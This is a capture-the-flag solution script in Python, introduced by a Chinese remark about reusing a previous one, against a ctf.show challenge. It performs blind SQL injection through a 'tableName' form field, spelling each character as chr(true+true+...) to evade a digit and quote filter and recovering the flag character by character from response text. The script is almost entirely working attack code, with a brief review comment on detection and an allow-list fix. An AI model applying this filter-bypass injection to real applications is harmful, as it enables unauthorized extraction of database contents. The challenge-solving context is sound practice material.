复用上一题的脚本就行
import requests, re
# Candidate alphabet tried at every position of the value being recovered.
dic = (
    "-"
    "1234567890"
    "abcdefghijklmnopqrstuvwxyz"
)
# Endpoint of the CTF challenge instance this script was written for.
url = "http://241b3994-3e6b-4390-886d-7f042ef22362.challenge.ctf.show/select-waf.php"
# Characters confirmed so far, in order.
res = list()
# Template for the `tableName` form field; `{}` receives the comma-separated
# chr(...) expressions that spell out the LIKE pattern.
post_tem = "ctfshow_user group by pass HAVING pass like(concat({}))"
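def str_to_hex(s):
    """Return the hexadecimal spelling of every character in *s*, concatenated.

    Each code point is written with at least two lowercase hex digits, so
    characters below 0x10 (for example a newline) keep their leading zero
    and the result can be split back into unambiguous pairs for ASCII input.
    Code points above 0xFF produce more than two digits.

    An empty string yields an empty string.
    """
    # format(..., "02x") zero-pads; hex() alone would turn "\n" into "a".
    return "".join(format(ord(ch), "02x") for ch in s)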
def createNum(n):
    """Spell the integer *n* as a sum of ``true`` terms.

    Returns ``"true"`` repeated *n* times and joined with ``+``, e.g.
    ``createNum(3) == "true+true+true"``. The result therefore contains no
    digit characters. Any *n* below 1 still yields a single ``"true"``.
    """
    # max(..., 1) mirrors the seed term that is always present.
    terms = ["true"] * max(n, 1)
    return "+".join(terms)
def createStrNum(s):
    """Encode *s* as a comma-separated list of ``chr(<sum of true>)`` calls.

    Every character is replaced by ``chr(`` + ``createNum(ord(char))`` + ``)``,
    and the pieces are joined with commas, ready to be dropped into the
    ``concat({})`` slot of the request template.

    *s* must be non-empty: indexing the first character raises ``IndexError``
    otherwise.
    """
    head, tail = s[0], s[1:]
    pieces = ["chr(" + createNum(ord(head)) + ")"]
    for ch in tail:
        pieces.append("chr(" + createNum(ord(ch)) + ")")
    return ",".join(pieces)
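# Recover the value one character at a time: for each position, try every
# character in `dic`, submit the LIKE-prefix condition, and keep the character
# when the response text contains "$user_count = 1".
#
# NOTE(review): every character is sent as chr(true+true+...), so the
# tableName value carries no digits or quotes and runs to thousands of
# characters. Unusually long form values with repeated "+true" are a usable
# detection signal; the durable fix is presumably server-side, i.e. mapping
# tableName through an allow-list instead of placing it into the SQL text.
for _ in range(1, 50):
    known_len = len(res)
    for candidate in dic:
        res.append(candidate)
        post = {"tableName": post_tem.format(createStrNum("ctfshow{" + "".join(res) + "%}"))}
        print(post)
        # A timeout keeps one stalled request from hanging the whole run.
        r = requests.post(url=url, data=post, timeout=10)
        # Raw string: "\$" in a plain literal is an invalid escape sequence
        # and triggers a warning on current Python versions.
        if re.search(r"\$user_count = 1", r.text):
            break
        # Candidate did not match; discard it and try the next one.
        res.pop()
    # No candidate extended the prefix, so the value is complete.
    if known_len == len(res):
        break
print("ctfshow{" + "".join(res) + "}")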